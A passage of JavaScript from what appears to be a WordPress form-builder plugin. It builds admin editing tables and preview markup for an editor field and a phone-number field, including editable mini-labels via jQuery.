			el_size_h.setAttribute("onKeyPress", "return check_isnum(event)");
            el_size_h.setAttribute("onKeyUp", "change_h_style('"+i+"_elementform_id_temp', this.value)");
			
	var el_first_value_label = document.createElement('label');
	        el_first_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 13px";
		el_first_value_label.innerHTML = "Value if empty";
	
	var el_first_value_input = document.createElement('input');
                el_first_value_input.setAttribute("id", "el_first_value_input");
                el_first_value_input.setAttribute("type", "text");
                el_first_value_input.setAttribute("value", w_title);
                
                el_first_value_input.setAttribute("onKeyUp", "change_input_value(this.value,'"+i+"_elementform_id_temp')");
	var el_required_label = document.createElement('label');
	        el_required_label.setAttribute("class", "fm-field-label");
		el_required_label.setAttribute("for", "el_send");
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_send");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("value", "yes");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
			    el_required.setAttribute("checked", "checked");
		

		
	var el_style_label = document.createElement('label');
	        el_style_label.setAttribute("class", "fm-field-label");
		el_style_label.setAttribute("for", "element_style");
			el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "element_style");
				el_style_textarea.setAttribute("type", "text");
				el_style_textarea.setAttribute("value", w_class);
                
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_attr_label = document.createElement('label');
	                el_attr_label.setAttribute("class", "fm-field-label");
		el_attr_label.setAttribute("for", "el_choices_add");
			el_attr_label.innerHTML = "Additional Attributes";
			
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_text')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.setAttribute("class", "fm-field-choice");
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_text')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.setAttribute("class", "fm-field-choice");
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_text')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_text')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td8.appendChild(el_label_size_label);
	edit_main_td8_1.appendChild(el_label_size);
	
	
	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(el_label_left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(el_label_top);
	
	edit_main_td3.appendChild(el_size_label);
	
	edit_main_td3_1.appendChild(el_size_w);
	edit_main_td3_1.appendChild(X);
	edit_main_td3_1.appendChild(el_size_h);
	
	edit_main_td4.appendChild(el_first_value_label);
	edit_main_td4_1.appendChild(el_first_value_input);
	
	edit_main_td5.appendChild(el_style_label);
	edit_main_td5_1.appendChild(el_style_textarea);
	
	edit_main_td6.appendChild(el_required_label);
	edit_main_td6_1.appendChild(el_required);
	
	
	
	
	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br6);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");

	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);

	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);

	edit_main_table.appendChild(edit_main_tr7);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_text');

//show table

	element='editor';
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_wdeditor");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required= document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");			
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
			
	
			
	var div = document.createElement('div');
      	div.setAttribute("id", "main_div");
		

		var div_field = document.createElement('div');
           	div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
						
      	var div_label = document.createElement('div');
         	div_label.setAttribute("align", 'left');
         	div_label.style.display="table-cell";
			div_label.style.width=w_field_label_size+"px";
           	div_label.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var div_element = document.createElement('div');
         	div_element.setAttribute("align", 'left');
          	div_element.style.display="table-cell";
          	div_element.setAttribute("id", i+"_element_sectionform_id_temp");
		
		
			
      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
      
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
	if(w_required=="yes")
			required.innerHTML = " *";
			
			
			
	var adding = document.createElement('input');
		adding.setAttribute("id", i+"_elementform_id_temp");
		adding.setAttribute("name", i+"_elementform_id_temp");
		adding.setAttribute("type", "hidden");
		adding.style.width = w_size_w+"px";
		adding.style.height = w_size_h+"px";
		adding.setAttribute("title", w_title);

	var adding_text = document.createElement('span');
		adding_text.style.color="red";
		adding_text.style.fontStyle="italic";
		adding_text.innerHTML="Editor doesn't display in back end";		
	
	Left = document.createTextNode(i+"_editorform_id_temp");
	var div_for_editor = document.createElement('div');
		div_for_editor.style.display="none";
	
		var main_td  = document.getElementById('show_table');
	
      
      	div_label.appendChild(label);
      	div_label.appendChild(required);
      	div_element.appendChild(adding_type);
	
      	div_element.appendChild(adding_required);

      	div_element.appendChild(adding);
		div_element.appendChild(adding_text);
		div_for_editor.appendChild(Left);
		div_element.appendChild(div_for_editor);
      	div_field.appendChild(div_label);
      	div_field.appendChild(div_element);
      
      
      	div.appendChild(div_field);
      	div.appendChild(br3);
      	main_td.appendChild(div);
	if(w_field_label_pos=="top")
				label_top(i);
change_class(w_class, i);
refresh_attr(i, 'type_text');
}




function type_phone(i, w_field_label, w_field_label_size, w_field_label_pos, w_size, w_first_val, w_title, w_mini_labels, w_required, w_unique, w_class, w_attr_name, w_attr_value) {
	
	document.getElementById("element_type").value="type_phone";
	delete_last_child();
	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');
	var edit_main_tr8  = document.createElement('tr');
	var edit_main_tr9  = document.createElement('tr');
	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
	var edit_main_td4 = document.createElement('td');
	var edit_main_td4_1 = document.createElement('td');
	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');
	var edit_main_td7 = document.createElement('td');
	var edit_main_td7_1 = document.createElement('td');
	var edit_main_td8 = document.createElement('td');
	var edit_main_td8_1 = document.createElement('td');
	var edit_main_td9 = document.createElement('td');
	var edit_main_td9_1 = document.createElement('td');
		  
	var el_label_label = document.createElement('label');
		el_label_label.setAttribute("class", "fm-field-label");
		el_label_label.setAttribute("for", "edit_for_label");
		el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
				el_label_textarea.innerHTML = w_field_label;
	
	var el_label_size_label = document.createElement('label');
		el_label_size_label.setAttribute("class", "fm-field-label");
	    el_label_size_label.setAttribute("for", "edit_for_label_size");
		el_label_size_label.innerHTML = "Field label size(px) ";
		
	var el_label_size = document.createElement('input');
	    el_label_size.setAttribute("id", "edit_for_label_size");
	    el_label_size.setAttribute("type", "text");
	    el_label_size.setAttribute("value", w_field_label_size);
		el_label_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_label_size.setAttribute("onKeyUp", "change_w_style('"+i+"_label_sectionform_id_temp', this.value)");

	var el_label_position_label = document.createElement('label');
		el_label_position_label.setAttribute("class", "fm-field-label");
		el_label_position_label.innerHTML = "Field label position";

	var el_label_position1 = document.createElement('input');
		el_label_position1.setAttribute("id", "edit_for_label_position_top");
		el_label_position1.setAttribute("type", "radio");
		el_label_position1.setAttribute("name", "edit_for_label_position");
		el_label_position1.setAttribute("onchange", "label_left("+i+")");

	var el_label_left = document.createElement('label');
		el_label_left.setAttribute("for", "edit_for_label_position_top");
		el_label_left.innerHTML = "Left";	

	var el_label_position2 = document.createElement('input');
		el_label_position2.setAttribute("id", "edit_for_label_position_left");
		el_label_position2.setAttribute("type", "radio");
		el_label_position2.setAttribute("name", "edit_for_label_position");
		el_label_position2.setAttribute("onchange", "label_top("+i+")");

	var el_label_top = document.createElement('label');
		el_label_top.setAttribute("for", "edit_for_label_position_left");
		el_label_top.innerHTML = "Top";
		
	if(w_field_label_pos=="top")
		el_label_position2.setAttribute("checked", "checked");
	else
		el_label_position1.setAttribute("checked", "checked");

	var el_size_label = document.createElement('label');
		el_size_label.setAttribute("class", "fm-field-label");
	        el_size_label.setAttribute("for", "edit_for_input_size");
			el_size_label.innerHTML = "Field size(px) ";
	var el_size = document.createElement('input');
			el_size.setAttribute("id", "edit_for_input_size");
			el_size.setAttribute("type", "text");
			el_size.setAttribute("value", w_size);			
			el_size.setAttribute("onKeyPress", "return check_isnum(event)");
            el_size.setAttribute("onKeyUp", "change_w_style('"+i+"_element_lastform_id_temp', this.value);");

	var gic = document.createTextNode("-");

	var el_first_value_label = document.createElement('label');
		el_first_value_label.setAttribute("class", "fm-field-label");
		el_first_value_label.setAttribute("for", "el_first_value_area");
		el_first_value_label.innerHTML = "Value if empty ";
	
	var el_first_value_area = document.createElement('input');
                el_first_value_area.setAttribute("id", "el_first_value_area");
                el_first_value_area.setAttribute("type", "text");
                el_first_value_area.setAttribute("value", w_title[0]);
				el_first_value_area.style.cssText = "width:66px;";
                el_first_value_area.setAttribute("onKeyUp", "change_input_value(this.value,'"+i+"_element_firstform_id_temp')");

	var el_first_value_phone = document.createElement('input');
                el_first_value_phone.setAttribute("id", "el_first_value_phone");
                el_first_value_phone.setAttribute("type", "text");
                el_first_value_phone.setAttribute("value", w_title[1]);
                el_first_value_phone.style.cssText = "width:127px;";

                el_first_value_phone.setAttribute("onKeyUp", "change_input_value(this.value,'"+i+"_element_lastform_id_temp')");


	var el_required_label = document.createElement('label');
		el_required_label.setAttribute("class", "fm-field-label");
	        el_required_label.setAttribute("for", "el_required");
			el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_required");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
                el_required.setAttribute("checked", "checked");	

	var el_unique_label = document.createElement('label');
		el_unique_label.setAttribute("class", "fm-field-label");
				el_unique_label.setAttribute("for", "el_unique");
				el_unique_label.innerHTML = "Allow only unique values";
	
	var el_unique = document.createElement('input');
                el_unique.setAttribute("id", "el_unique");
                el_unique.setAttribute("type", "checkbox");
                el_unique.setAttribute("onclick", "set_unique('"+i+"_uniqueform_id_temp')");
	if(w_unique=="yes")
                el_unique.setAttribute("checked", "checked");
				
	var el_style_label = document.createElement('label');
		el_style_label.setAttribute("class", "fm-field-label");
	        el_style_label.setAttribute("for", "el_style_textarea");
			el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
                el_style_textarea.setAttribute("id", "el_style_textarea");
				el_style_textarea.setAttribute("type", "text");
				el_style_textarea.setAttribute("value", w_class);
                
                el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_attr_label = document.createElement('label');
		el_attr_label.setAttribute("class", "fm-field-label");
				el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
				el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_name')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
				el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
			el_attr_name.setAttribute("type", "text");
			el_attr_name.setAttribute("class", "fm-field-choice");
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_name')");
			
		var el_attr_value = document.createElement('input');
			el_attr_value.setAttribute("type", "text");
			el_attr_value.setAttribute("class", "fm-field-choice");
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_name')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_name')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

		
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td9.appendChild(el_label_size_label);
	edit_main_td9_1.appendChild(el_label_size);
	
	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(el_label_left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(el_label_top);
	
	edit_main_td3.appendChild(el_first_value_label);
	edit_main_td3_1.appendChild(el_first_value_area);
	edit_main_td3_1.appendChild(gic);
	edit_main_td3_1.appendChild(el_first_value_phone);
	
	
	edit_main_td7.appendChild(el_size_label);
	edit_main_td7_1.appendChild(el_size);
	
	edit_main_td4.appendChild(el_style_label);
	edit_main_td4_1.appendChild(el_style_textarea);
	
	edit_main_td5.appendChild(el_required_label);
	edit_main_td5_1.appendChild(el_required);
	
	edit_main_td8.appendChild(el_unique_label);
	edit_main_td8_1.appendChild(el_unique);
	
	
	
	
	edit_main_td6.appendChild(el_attr_label);
	edit_main_td6.appendChild(el_attr_add);
	edit_main_td6.appendChild(br3);
	edit_main_td6.appendChild(el_attr_table);
	edit_main_td6.setAttribute("colspan", "2");
	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr9.appendChild(edit_main_td9);
	edit_main_tr9.appendChild(edit_main_td9_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr9);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr7);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr6);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_name');

//show table

	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_phone");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
			
	var adding_required= document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
			
	var adding_unique= document.createElement("input");
            adding_unique.setAttribute("type", "hidden");
            adding_unique.setAttribute("value", w_unique);
            adding_unique.setAttribute("name", i+"_uniqueform_id_temp");
            adding_unique.setAttribute("id", i+"_uniqueform_id_temp");
	    
     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
			
		var div_for_editable_labels = document.createElement('div');
			div_for_editable_labels.setAttribute("class", "fm-editable-label");
			
      	edit_labels = document.createTextNode("The labels of the fields are editable. Please, click the label to edit.");

		div_for_editable_labels.appendChild(edit_labels);  
		
      	var div_field = document.createElement('div');
           	div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
						
      	var div_label = document.createElement('div');
         	div_label.setAttribute("align", 'left');
         	div_label.style.display="table-cell";
			div_label.style.width=w_field_label_size+"px";
           	div_label.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var div_element = document.createElement('div');
         	div_element.setAttribute("align", 'left');
          	div_element.style.display="table-cell";
          	div_element.setAttribute("id", i+"_element_sectionform_id_temp");
			
      	var table_name = document.createElement('div');
		    table_name.style.display="table";
           	table_name.setAttribute("id", i+"_table_name");
			
      	var tr_name1 = document.createElement('div');
 		    tr_name1.style.display="table-row";
          	tr_name1.setAttribute("id", i+"_tr_name1");
			
      	var tr_name2 = document.createElement('div');
 		    tr_name2.style.display="table-row";
           	tr_name2.setAttribute("id", i+"_tr_name2");
			
      	var td_name_input1 = document.createElement('div');
  		    td_name_input1.style.display="table-cell";
          	td_name_input1.setAttribute("id", i+"_td_name_input_first");
			
      	var td_name_input2 = document.createElement('div');
  		    td_name_input2.style.display="table-cell";
          	td_name_input2.setAttribute("id", i+"_td_name_input_last");
		
      	var td_name_label1 = document.createElement('div');
 		    td_name_label1.style.display="table-cell";
           	td_name_label1.setAttribute("id", i+"_td_name_label_first");
           	td_name_label1.setAttribute("align", "left");
			
      	var td_name_label2 = document.createElement('div');
  		    td_name_label2.style.display="table-cell";
          	td_name_label2.setAttribute("id", i+"_td_name_label_last");
           	td_name_label2.setAttribute("align", "left");
			
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
			label.style.verticalAlign="top";
	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
	if(w_required=="yes")
			required.innerHTML = " *";	
			
	var first = document.createElement('input');
        first.setAttribute("type", 'text');
		if(w_title[0]==w_first_val[0])
			first.setAttribute("class", "input_deactive");
		else
			first.setAttribute("class", "input_active");
	    first.style.cssText = "width:50px";
	    first.setAttribute("id", i+"_element_firstform_id_temp");
	    first.setAttribute("name", i+"_element_firstform_id_temp");
		first.setAttribute("value", w_first_val[0]);
		first.setAttribute("title", w_title[0]);
		first.setAttribute("onFocus", 'delete_value("'+i+'_element_firstform_id_temp")');
		first.setAttribute("onBlur", 'return_value("'+i+'_element_firstform_id_temp")');
	    first.setAttribute("onChange", "change_value('"+i+"_element_firstform_id_temp')");
		first.setAttribute("onKeyPress", "return check_isnum(event)");
		
	var gic = document.createElement('span');
	    gic.setAttribute("class", "wdform_line");
		gic.style.cssText = "margin: 0px 4px 0px 4px; padding: 0px;";
		gic.innerHTML = "-";	

	var first_label = document.createElement('label');
	    first_label.setAttribute("class", "mini_label");
	    first_label.setAttribute("id", i+"_mini_label_area_code");
	    first_label.innerHTML= w_mini_labels[0];
			
	var last = document.createElement('input');
        last.setAttribute("type", 'text');
 		if(w_title[1]==w_first_val[1])
			last.setAttribute("class", "input_deactive");
		else
			last.setAttribute("class", "input_active");
	    last.style.cssText = "width:"+w_size+"px";
		last.setAttribute("id", i+"_element_lastform_id_temp");
	   	last.setAttribute("name", i+"_element_lastform_id_temp");
		last.setAttribute("value", w_first_val[1]);
		last.setAttribute("title", w_title[1]);
		last.setAttribute("onFocus", 'delete_value("'+i+'_element_lastform_id_temp")');
		last.setAttribute("onBlur", 'return_value("'+i+'_element_lastform_id_temp")');
		last.setAttribute("onChange", "change_value('"+i+"_element_lastform_id_temp')");
		last.setAttribute("onKeyPress", "return check_isnum(event)");

	var last_label = document.createElement('label');
		last_label.setAttribute("class", "mini_label");
		last_label.setAttribute("id", i+"_mini_label_phone_number");
		last_label.innerHTML=w_mini_labels[1];
			
    var main_td  = document.getElementById('show_table');
      
      	div_label.appendChild(label);
      	div_label.appendChild(required );
		
      	td_name_input1.appendChild(first);
      	td_name_input1.appendChild(gic);
      	td_name_input2.appendChild(last);
      	tr_name1.appendChild(td_name_input1);
      	tr_name1.appendChild(td_name_input2);
      	td_name_label1.appendChild(first_label);
      	td_name_label2.appendChild(last_label);
      	tr_name2.appendChild(td_name_label1);
      	tr_name2.appendChild(td_name_label2);
      	table_name.appendChild(tr_name1);
      	table_name.appendChild(tr_name2);
       	div_element.appendChild(adding_type);
       	div_element.appendChild(adding_required);
       	div_element.appendChild(adding_unique);
    	div_element.appendChild(table_name);
      	div_field.appendChild(div_label);
      	div_field.appendChild(div_element);
      	div.appendChild(div_field);
		div.appendChild(br1);
		div.appendChild(div_for_editable_labels);
      	main_td.appendChild(div);
		
	if(w_field_label_pos=="top")
				label_top(i);

change_class(w_class, i);
refresh_attr(i, 'type_name');

jQuery(document).ready(function() {	
	jQuery("label#"+i+"_mini_label_area_code").click(function() {		
	if (jQuery(this).children('input').length == 0) {		

		var area_code = "<input type='text' class='area_code' size='10' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";		

		jQuery(this).html(area_code);		
		jQuery("input.area_code").focus();		
		jQuery("input.area_code").blur(function() {	

		var value = jQuery(this).val();			
		jQuery("#"+i+"_mini_label_area_code").text(value);		
		});		
	}	
	});	

	
	jQuery("label#"+i+"_mini_label_phone_number").click(function() {		

	if (jQuery(this).children('input').length == 0) {			
		var phone_number = "<input type='text' class='phone_number'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";						

		jQuery(this).html(phone_number);					

		jQuery("input.phone_number").focus();			
		jQuery("input.phone_number").blur(function() {		
		
		var value = jQuery(this).val();			
		jQuery("#"+i+"_mini_label_phone_number").text(value);		
		});	
	}	
	});
	
	});


}

function change_input_range(type, id)
{
	var s='';
	if(document.getElementById('el_range_'+type+'1').value!='')
		s=document.getElementById('el_range_'+type+'1').value;

	if(document.getElementById('el_range_'+type+'2').value!='')
	{
		if(document.getElementById('el_range_'+type+'1').value=='')
			s='0';			

		s=s+'.'+document.getElementById('el_range_'+type+'2').value;
